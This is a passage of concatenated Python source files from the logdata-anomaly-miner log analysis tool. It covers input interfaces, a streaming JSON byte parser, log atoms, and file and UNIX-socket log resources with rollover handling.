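                    if not isinstance(path, str):
                        msg = f"{attr} values must be of the type String."
                        logging.getLogger(DEBUG_LOG_NAME).error(msg)
                        raise TypeError(msg)
                    if path == "":
                        msg = f"{attr} values must not be empty."
                        logging.getLogger(DEBUG_LOG_NAME).error(msg)
                        raise ValueError(msg)
        if hasattr(self, "log_resource_ignore_list"):
            # Only the two resource URL schemes the input layer knows are accepted.
            for path in self.log_resource_ignore_list:
                if not (path.startswith("file://") or path.startswith("unix://")):
                    msg = "log_resource_ignore_list values must start with file:// or unix://."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
        if hasattr(self, "target_value_list") and self.target_value_list is not None and not isinstance(self.target_value_list, list):
            msg = "target_value_list has to be of the type list."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "set_lower_limit") and self.set_lower_limit is not None and hasattr(self, "set_upper_limit") and \
                self.set_upper_limit is not None and self.set_lower_limit >= self.set_upper_limit:
            msg = "set_lower_limit must be smaller than set_upper_limit."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if hasattr(self, "stream") and not isinstance(self.stream, IOBase):
            msg = "stream must be an instance of IOBase."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if hasattr(self, "allowlist_rules"):
            if not isinstance(self.allowlist_rules, list):
                msg = "allowlist_rules has to be of the type list."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            if len(self.allowlist_rules) == 0:
                msg = "allowlist_rules must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        # getattr with a default: a component using idf without ever defining id_path_list should get the ValueError below,
        # not an AttributeError.
        if hasattr(self, "idf") and self.idf and not getattr(self, "id_path_list", None):
            msg = "id_path_list must be set when using idf=True."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

    @abc.abstractmethod
    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        @param log_atom binary raw atom data
        @return True if this handler was really able to handle and process the atom. Depending on this information, the caller
        may decide if it makes sense passing the atom also to other handlers or to retry later.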
This behaviour has to be documented at each source implementation sending LogAtoms. """ def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL > 0: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 class PersistableComponentInterface(metaclass=abc.ABCMeta): """This is the common interface of all handlers suitable for persisting data.""" @abc.abstractmethod def __init__(self): """Initialize the PersistableComponentInterface.""" @abc.abstractmethod def do_persist(self, log_atom): """Immediately write persistence data to storage.""" @abc.abstractmethod def load_persistence_data(self): """Load the persistence data from storage.""" class LogDataResource(metaclass=abc.ABCMeta): """This is the superinterface of each logdata resource monitored by aminer. The interface is designed in a way, that instances of same subclass can be used both on aminer parent process side for keeping track of the resources and forwarding the file descriptors to the child, but also on child side for the same purpose. The only difference is, that on child side, the stream reading and read continuation features are used also. After creation on child side, this is the sole place for reading and closing the streams. An external process may use the file descriptor only to wait for input via select. """ @abc.abstractmethod def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """Create a new LogDataResource. Object creation must not touch the logStreamFd or read any data, unless repositioning_data was given. 
In the later case, the stream has to support seek operation to reread data. @param log_resource_name the unique encoded name of this source as byte array. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data if not None, attemt to position the the stream using the given data. """ @abc.abstractmethod def open(self, reopen_flag=False): """Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid logStreamFd was already provided, is still open and reopenFlag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ @abc.abstractmethod def get_resource_name(self): """Get the name of this log resource.""" @abc.abstractmethod def get_file_descriptor(self): """Get the file descriptor of this open resource.""" @abc.abstractmethod def fill_buffer(self): """Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ @abc.abstractmethod def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" @abc.abstractmethod def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable. """ @abc.abstractmethod def close(self): """Close this logdata resource. Data access methods will not work any more afterwards. 
""" JsonStateMachine.py000066400000000000000000000206021500476301700340340ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input# DISCLAIMER: adapted code from # https://stackoverflow.com/questions/6886283/how-i-can-i-lazily-read-multiple-json-values-from-a-file-stream-in-python # A streaming byte oriented JSON parser. Feed it a single byte at a time and # it will emit complete objects as it comes across them. Whitespace within and # between objects is ignored. This means it can parse newline delimited JSON. import math def json_machine(emit, next_func=None): def _value(byte_data): if not byte_data: return None if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _value # Ignore whitespace # only allow json objects in our case if byte_data != 0x7b and next_func is _value: return None if byte_data == 0x22: # " return string_machine(on_value) if byte_data in (0x2b, 0x2d) or (0x30 <= byte_data < 0x3a): # -, + or 0-9 return number_machine(byte_data, on_number) if byte_data == 0x7b: #: return object_machine(on_value) if byte_data == 0x5b: # [ return array_machine(on_value) if byte_data == 0x74: # t return constant_machine(TRUE, True, on_value) if byte_data == 0x66: # f return constant_machine(FALSE, False, on_value) if byte_data == 0x6e: # n return constant_machine(NULL, None, on_value) if next_func is _value: return None return next_func(byte_data) def on_value(value): emit(value) return next_func def on_number(number, byte): emit(number) return _value(byte) next_func = next_func or _value return _value TRUE = [0x72, 0x75, 0x65] FALSE = [0x61, 0x6c, 0x73, 0x65] NULL = [0x75, 0x6c, 0x6c] def constant_machine(bytes_data, value, emit): i = 0 length = len(bytes_data) def _constant(byte_data): nonlocal i if byte_data != bytes_data[i]: i += 1 return None i += 1 if i < length: return _constant return emit(value) return _constant def string_machine(emit): string = "" def _string(byte_data): nonlocal string if byte_data == 
0x22: # " return emit(string) if byte_data == 0x5c: # \ return _escaped_string if byte_data & 0x80: # UTF-8 handling return utf8_machine(byte_data, on_char_code) if byte_data < 0x20 and byte_data != 0xa: # ASCII control character - \n is allowed return None string += chr(byte_data) return _string def _escaped_string(byte_data): nonlocal string if byte_data in (0x22, 0x5c, 0x2f): # " \ / string += chr(byte_data) return _string if byte_data == 0x62: # b string += "\b" return _string if byte_data == 0x66: # f string += "\f" return _string if byte_data == 0x6e: # n string += "\n" return _string if byte_data == 0x72: # r string += "\r" return _string if byte_data == 0x74: # t string += "\t" return _string if byte_data == 0x75: # u return hex_machine(on_char_code) return None def on_char_code(char_code): nonlocal string string += chr(char_code) return _string return _string # Nestable state machine for UTF-8 Decoding. def utf8_machine(byte_data, emit): left = 0 num = 0 def _utf8(byte_data): nonlocal num, left if (byte_data & 0xc0) != 0x80: return None left = left - 1 num |= (byte_data & 0x3f) << (left * 6) if left: return _utf8 return emit(num) if 0xc0 <= byte_data < 0xe0: # 2-byte UTF-8 Character left = 1 num = (byte_data & 0x1f) << 6 return _utf8 if 0xe0 <= byte_data < 0xf0: # 3-byte UTF-8 Character left = 2 num = (byte_data & 0xf) << 12 return _utf8 if 0xf0 <= byte_data < 0xf8: # 4-byte UTF-8 Character left = 3 num = (byte_data & 0x07) << 18 return _utf8 return None # Nestable state machine for hex escaped characters def hex_machine(emit): left = 4 num = 0 def _hex(byte_data): nonlocal num, left if 0x30 <= byte_data < 0x3a: i = byte_data - 0x30 elif 0x61 <= byte_data <= 0x66: i = byte_data - 0x57 elif 0x41 <= byte_data <= 0x46: i = byte_data - 0x37 else: return None left -= 1 num |= i << (left * 4) if left: return _hex return emit(num) return _hex def number_machine(byte_data, emit): sign = 1 number = 0 decimal = 0 esign = 1 exponent = 0 dividend = 10 start_with_zero 
= False def _mid(byte_data): if start_with_zero and byte_data not in (0x2e, 0x45, 0x65, 0x7d, 0x2c, 0xa, 0x20): # . E e } , \n Space return None if byte_data == 0x2e: # . return _decimal return _later(byte_data) def _number(byte_data): nonlocal number if 0x30 <= byte_data < 0x3a: number = number * 10 + (byte_data - 0x30) return _number return _mid(byte_data) def _start(byte_data): nonlocal start_with_zero if byte_data == 0x30: start_with_zero = True return _mid if 0x30 < byte_data < 0x3a: return _number(byte_data) return None def _decimal(byte_data): nonlocal decimal nonlocal dividend if 0x30 <= byte_data < 0x3a: decimal += (byte_data - 0x30) / dividend dividend *= 10 return _decimal return _later(byte_data) def _later(byte_data): if byte_data in (0x45, 0x65): # E e return _esign return _done(byte_data) def _esign(byte_data): nonlocal esign if byte_data == 0x2b: # + return _exponent if byte_data == 0x2d: # - esign = -1 return _exponent return _exponent(byte_data) def _exponent(byte_data): nonlocal exponent if 0x30 <= byte_data < 0x3a: exponent = exponent * 10 + (byte_data - 0x30) return _exponent return _done(byte_data) def _done(byte_data): value = sign * (number + decimal) if exponent: value *= math.pow(10, esign * exponent) return emit(value, byte_data) if byte_data == 0x2d: # - sign = -1 return _start if byte_data == 0x2b: # + return _start return _start(byte_data) def array_machine(emit): array_data = [] def _array(byte_data): if byte_data == 0x5d: # ] return emit(array_data) return json_machine(on_value, _comma)(byte_data) def on_value(value): array_data.append(value) def _comma(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _comma # Ignore whitespace if byte_data == 0x2c: # , return json_machine(on_value, _comma) if byte_data == 0x5d: # ] return emit(array_data) return None return _array def object_machine(emit): object_data = {} key = None def _object(byte_data): if byte_data == 0x7d: # return emit(object_data) return _key(byte_data) def 
_key(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _object # Ignore whitespace if byte_data == 0x22: return string_machine(on_key) return None def on_key(result): nonlocal key key = result return _colon def _colon(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _colon # Ignore whitespace if byte_data == 0x3a: # : return json_machine(on_value, _comma) return None def on_value(value): object_data[key] = value def _comma(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _comma # Ignore whitespace if byte_data == 0x2c: # , return _key if byte_data == 0x7d: # return emit(object_data) return None return _object logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogAtom.py000066400000000000000000000056071500476301700322660ustar00rootroot00000000000000"""This module defines a log atom. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.ParserMatch import ParserMatch class LogAtom: """This class defines a log atom used for parsing.""" idCounter = -1 def __init__(self, raw_data, parser_match, atom_time, source): """Create a log atom from scratch.""" if not isinstance(raw_data, bytes): msg = "raw_data must be of type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(raw_data) == 0: msg = "raw_data must not be empty." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.raw_data = raw_data if parser_match is not None and not isinstance(parser_match, ParserMatch): msg = "parser_match must be of type ParserMatch." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.parser_match = parser_match if atom_time is not None and (not isinstance(atom_time, (int, float)) or isinstance(atom_time, bool)): msg = "atom_time must be of type integer or float." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.atom_time = atom_time self.source = source LogAtom.idCounter += 1 self.log_line_identifier = LogAtom.idCounter def get_parser_match(self): """Get the parser match associated with this LogAtom. @return the match or None for (yet) unparsed LogAtoms. """ return self.parser_match def set_timestamp(self, timestamp): """Update the default timestamp value associated with this LogAtom. The method can be called more than once to allow correction of fine-adjusting of timestamps by analysis filters after initial parsing procedure. """ self.atom_time = timestamp def get_timestamp(self): """Get the default timestamp value for this LogAtom. @return the timestamp as number of seconds since 1970. """ return self.atom_time def is_parsed(self): """Check if this atom is parsed by checking if parserMatch object is attached.""" return self.parser_match is not None logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogStream.py000066400000000000000000000513221500476301700326140ustar00rootroot00000000000000"""This module contains interfaces and classes for logdata resource handling and combining them to resumable virtual LogStream objects. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import base64 import errno import hashlib import os import socket import stat import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util import SecureOSFunctions from aminer.util.StringUtil import encode_byte_string_as_string from aminer.input.InputInterfaces import LogDataResource from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer class FileLogDataResource(LogDataResource): """This class defines a single log data resource using an underlying file accessible via the file descriptor. The characteristics of this type of resource is, that reopening and repositioning of the stream has to be possible. """ def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """Create a new file type resource. @param log_resource_name the unique name of this source as bytes array, has to start with "file://" before the file path. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data if not None, attempt to position the stream using the given data. """ if not isinstance(log_resource_name, bytes): msg = "log_resource_name must be of type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(log_stream_fd, bool) or not isinstance(log_stream_fd, int): msg = "log_stream_fd must be of type integer." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not log_resource_name.startswith(b"file://") or log_resource_name == b"file://": msg = "Attempting to create different type resource as file" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_resource_name = log_resource_name self.log_file_fd = log_stream_fd self.stat_data = None if self.log_file_fd >= 0: self.stat_data = os.fstat(log_stream_fd) self.buffer = b"" if isinstance(default_buffer_size, bool) or not isinstance(default_buffer_size, int): msg = "default_buffer_size must be of type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_buffer_size <= 0: msg = "default_buffer_size must not be smaller or equal to zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.default_buffer_size = default_buffer_size self.total_consumed_length = 0 # Create a hash for repositioning. There is no need to be cryptographically secure here: if upstream can manipulate the content, # to provoke hash collisions, correct positioning would not matter anyway. self.repositioning_digest = hashlib.md5() # nosec B328 if repositioning_data is not None and (not isinstance(repositioning_data, list) or len(repositioning_data) != 3 or isinstance( repositioning_data[0], bool) or not isinstance(repositioning_data[0], int) or isinstance(repositioning_data[1], bool) or not isinstance(repositioning_data[1], int) or not isinstance(repositioning_data[2], bytes)): msg = "repositioning_data must be a list with three elements with the data types [int, int, bytes]." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if (log_stream_fd != -1) and (repositioning_data is not None): if repositioning_data[0] != self.stat_data.st_ino: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, inode number mismatch" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) elif repositioning_data[1] > self.stat_data.st_size: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file size too small" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) else: hash_algo = hashlib.md5() # nosec B328 length = repositioning_data[1] while length != 0: block = None if length < default_buffer_size: block = os.read(self.log_file_fd, length) else: block = os.read(self.log_file_fd, default_buffer_size) if not block: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file shrunk while" \ f" reading" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) break hash_algo.update(block) length -= len(block) digest = hash_algo.digest() if length == 0: if digest == base64.b64decode(repositioning_data[2]): # Repositioning is OK, keep current digest and length data. self.total_consumed_length = repositioning_data[1] self.repositioning_digest = hash_algo else: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, digest changed" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) length = -1 if length != 0: # Repositioning failed, go back to the beginning of the stream. os.lseek(self.log_file_fd, 0, os.SEEK_SET) def open(self, reopen_flag=False): """Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid log_stream_fd was already provided, is still open and reopen_flag is False. 
@raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ if not reopen_flag and (self.log_file_fd != -1): msg = "Cannot reopen stream still open when not instructed to do so" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) log_file_fd = -1 stat_data = None try: log_file_fd = SecureOSFunctions.secure_open_file(self.log_resource_name[7:], os.O_RDONLY) stat_data = os.fstat(log_file_fd) except OSError as openOsError: msg = f"OSError occurred in FileLogDataResource.open(). Error message: {openOsError}" logging.getLogger(DEBUG_LOG_NAME).error(msg) if log_file_fd != -1: os.close(log_file_fd) if openOsError.errno == errno.ENOENT: return False raise if not stat.S_ISREG(stat_data.st_mode) and not stat.S_ISFIFO(stat_data.st_mode): os.close(log_file_fd) msg = f"Attempting to open non-regular file {encode_byte_string_as_string(self.log_resource_name)} as file" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if reopen_flag and (self.stat_data is not None) and (stat_data.st_ino == self.stat_data.st_ino) and ( stat_data.st_dev == self.stat_data.st_dev): # Reopening was requested, but we would reopen the file already opened, which is of no use. os.close(log_file_fd) return False # This is a new file or a successful reopen attempt. self.log_file_fd = log_file_fd self.stat_data = stat_data return True def get_resource_name(self): """Get the name of this log resource.""" return self.log_resource_name def get_file_descriptor(self): """Get the file descriptor of this open resource.""" return self.log_file_fd def fill_buffer(self): """Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. 
""" data = os.read(self.log_file_fd, self.default_buffer_size) self.buffer += data return len(data) def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" self.repositioning_digest.update(self.buffer[:length]) self.total_consumed_length += length self.buffer = self.buffer[length:] def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable. """ return [self.stat_data.st_ino, self.total_consumed_length, base64.b64encode(self.repositioning_digest.digest())] def close(self): """Close the log file.""" os.close(self.log_file_fd) self.log_file_fd = -1 class UnixSocketLogDataResource(LogDataResource): """This class defines a single log data resource connecting to a local UNIX socket. The characteristics of this type of resource is, that reopening works only after end of stream of was reached. """ def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """Create a new unix socket type resource. @param log_resource_name the unique name of this source as byte array, has to start with "unix://" before the file path. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data has to be None for this type of resource. """ if not isinstance(log_resource_name, bytes): msg = "log_resource_name must be of type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(log_stream_fd, bool) or not isinstance(log_stream_fd, int): msg = "log_stream_fd must be of type integer." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not log_resource_name.startswith(b"unix://") or log_resource_name == b"unix://": msg = "Attempting to create different type resource as unix" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_resource_name = log_resource_name self.log_stream_fd = log_stream_fd self.buffer = b"" if isinstance(default_buffer_size, bool) or not isinstance(default_buffer_size, int): msg = "default_buffer_size must be of type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_buffer_size <= 0: msg = "default_buffer_size must not be smaller or equal to zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.default_buffer_size = default_buffer_size self.total_consumed_length = 0 def open(self, reopen_flag=False): """Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid log_stream_fd was already provided, is still open and reopenFlag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ if reopen_flag: if self.log_stream_fd != -1: return False elif self.log_stream_fd != -1: msg = "Cannot reopen stream still open when not instructed to do so" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) log_socket = None try: log_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) log_socket.connect(self.log_resource_name[7:]) except socket.error as socketError: logging.getLogger(DEBUG_LOG_NAME).error( "OSError occurred in UnixSocketLogDataResource.open(). 
Error message: %s", socketError.msg) if log_socket is not None: log_socket.close() if socketError.errno in (errno.ENOENT, errno.ECONNREFUSED): return False # Transform exception to OSError as caller does not expect something else. raise OSError(socketError[0], socketError[1]) self.log_stream_fd = os.dup(log_socket.fileno()) log_socket.close() return True def get_resource_name(self): """Get the name of this log resource.""" return self.log_resource_name def get_file_descriptor(self): """Get the file descriptor of this open resource.""" return self.log_stream_fd def fill_buffer(self): """Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ data = os.read(self.log_stream_fd, self.default_buffer_size) self.buffer += data return len(data) def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" self.total_consumed_length += length self.buffer = self.buffer[length:] def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable. """ return None def close(self): """Close the log stream.""" os.close(self.log_stream_fd) self.log_stream_fd = -1 class LogStream: """This class defines a continuous stream of logging data from a given source. This class also handles rollover from one file descriptor to a new one. """ def __init__(self, log_data_resource, stream_atomizer): """Create a new log stream with an initial logDataResource. @param stream_atomizer the atomizer to forward data to. """ # The resource currently processed. Might also be None when previous # resource was read till end and no rollover to new one had occurred. if not isinstance(log_data_resource, LogDataResource): msg = "log_data_resource must be of type LogDataResource." 
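logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.log_data_resource = log_data_resource
        if not isinstance(stream_atomizer, ByteStreamLineAtomizer):
            # The message must name the parameter actually being checked; it previously repeated the log_data_resource text,
            # which sent operators looking at the wrong configuration value.
            msg = "stream_atomizer must be of type ByteStreamLineAtomizer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.stream_atomizer = stream_atomizer
        # Last reading state, those are the same as returned by StreamAtomizer
        # consumeData() method. Start with state 0 (more data required).
        self.last_consume_state = 0
        # Resources queued by add_next_resource(); roll_over() switches to them in FIFO order.
        self.next_resources = []

    def add_next_resource(self, next_log_data_resource):
        """Roll over from one fd to another one pointing to the newer version of the same file.

        This will also change reading behaviour of current resource to await EOF or stop as soon as first blocking read does not
        return any data.
        @param next_log_data_resource the resource to read from once the current one is exhausted; when there is no current
        resource it becomes the current one immediately.
        """
        # Just append the resource to the list of next resources. The next read operation without any input from the primary
        # resource will pick it up automatically.
        if self.log_data_resource is None:
            self.log_data_resource = next_log_data_resource
        else:
            self.next_resources.append(next_log_data_resource)

    def handle_stream(self):
        """Handle data from this stream by forwarding it to the atomizer.

        @return the file descriptor to monitoring for new input or -1 if there is no new data or atomizer was not yet ready to
        consume data. Handling should be tried again later on.
        """
        if self.log_data_resource is None:
            return -1
        if self.last_consume_state == 0:
            # We need more data, read it.
            read_length = self.log_data_resource.fill_buffer()
            if read_length == -1:
                self.last_consume_state = self.roll_over()
                return self.last_consume_state
            if read_length == 0:
                if not self.next_resources:
                    # There is just no input, but we still need more since last round as indicated by lastConsumeState. We would
                    # not have been called if this is a blocking stream, so this must be the preliminary end of the file. Tell
                    # caller to wait and retry read later on. Keep lastConsumeState value, consume still wants more data.
                    return -1
                # This seems to EOF for rollover.
                self.last_consume_state = self.roll_over()
                return self.last_consume_state
            # So there was something read, process it the same way as if data was already available in previous round.
        self.last_consume_state = self.stream_atomizer.consume_data(self.log_data_resource.buffer, False)
        if self.last_consume_state < 0:
            return -1
        if self.last_consume_state != 0:
            self.log_data_resource.update_position(self.last_consume_state)
        return self.log_data_resource.get_file_descriptor()

    def roll_over(self):
        """End reading of the current resource and switch to the next.

        This method does not handle last_consume_state, that has to be done outside.
        @return state in same manner as handle_stream()
        """
        consumed_length = self.stream_atomizer.consume_data(self.log_data_resource.buffer, True)
        if consumed_length < 0:
            # Consumer is not ready to consume yet. Retry later on.
            return -1
        if consumed_length != len(self.log_data_resource.buffer):
            if consumed_length != 0:
                # Some data consumed, unclear why not all when already at end of stream. Retry again immediately to find out why.
                self.log_data_resource.update_position(consumed_length)
                return self.log_data_resource.get_file_descriptor()
            # This is a clear protocol violation (see StreamAtomizer documentation): When at EOF, 0 is no valid return value.
            msg = f"Protocol violation by {self.stream_atomizer.__class__.__name__} detected, flushing data"
            logging.getLogger(DEBUG_LOG_NAME).critical(msg)
            print("FATAL: " + msg, file=sys.stderr)
            consumed_length = len(self.log_data_resource.buffer)
        # Everything consumed, so now ready for rollover.
        self.log_data_resource.update_position(consumed_length)
        self.log_data_resource.close()
        if not self.next_resources:
            self.log_data_resource = None
            return -1
        self.log_data_resource = self.next_resources[0]
        del self.next_resources[0]
        return self.log_data_resource.get_file_descriptor()

    def get_current_fd(self):
        """Get the file descriptor for reading the currently active log_data resource.

        @return the descriptor, or -1 when no resource is active.
        """
        if self.log_data_resource is None:
            return -1
        return self.log_data_resource.get_file_descriptor()

    def get_repositioning_data(self):
        """Get the repositioning information from the currently active underlying log_data resource.

        @return None when no resource is active.
        """
        if self.log_data_resource is None:
            return None
        return self.log_data_resource.get_repositioning_data()

    def close(self):
        """Close the log stream (the active resource only; queued next_resources are left untouched)."""
        if self.log_data_resource is not None:
            self.log_data_resource.close()
SimpleByteStreamLineAtomizerFactory.py000066400000000000000000000146271500476301700377520ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input"""This module defines a factory for instanciating line atomizers.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have
received a copy of the GNU General Public License along with this program. If not, see .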
""" import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.input.InputInterfaces import AtomizerFactory, AtomHandlerInterface from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.events.EventInterfaces import EventHandlerInterface class SimpleByteStreamLineAtomizerFactory(AtomizerFactory): """This factory just creates the same atomizer for each new resource. All parsed and unparsed atoms are delivered via two lists of handlers. """ def __init__(self, parsing_model, atom_handler_list, event_handler_list, default_timestamp_path_list=None, eol_sep=b'\n', json_format=False, xml_format=False, parser_model_dict=None, log_resources=None, use_real_time=False, continuous_timestamp_missing_warning=True): """Create the factory to forward data and events to the given lists for each newly created atomizer. @param default_timestamp_path_list if not empty list, the value of this timestamp field is extracted from parsed atoms and stored as default timestamp for that atom. """ if not isinstance(parsing_model, ModelElementInterface): msg = "parsing_model must be of type ModelElementInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.parsing_model = parsing_model if atom_handler_list is not None and (not isinstance(atom_handler_list, list) or not all( isinstance(x, AtomHandlerInterface) for x in atom_handler_list)): msg = "atom_handler_list must be None or a list of AtomHandlerInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.atom_handler_list = atom_handler_list if not isinstance(event_handler_list, list) or not all(isinstance(x, EventHandlerInterface) for x in event_handler_list): msg = "event_handler_list must be a list of EventHandlerInterface!" 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.event_handler_list = event_handler_list if default_timestamp_path_list is None: default_timestamp_path_list = [] if not isinstance(default_timestamp_path_list, list) or not all(isinstance(x, str) for x in default_timestamp_path_list): msg = "default_timestamp_path_list must be a list of strings!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.default_timestamp_path_list = default_timestamp_path_list if not isinstance(eol_sep, bytes): msg = "eol_sep parameter must be of type bytes!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(eol_sep) == 0: msg = "eol_sep parameter must not be empty!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.eol_sep = eol_sep if not isinstance(json_format, bool): msg = "json_format parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.json_format = json_format if not isinstance(xml_format, bool): msg = "xml_format parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.xml_format = xml_format if json_format is True and xml_format is True: msg = "json_format and xml_format can not be true at the same time." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(use_real_time, bool): msg = "use_real_time parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.use_real_time = use_real_time self.printed_warning = False if not isinstance(continuous_timestamp_missing_warning, bool): msg = "continuous_timestamp_missing_warning parameter must be of type boolean!" 
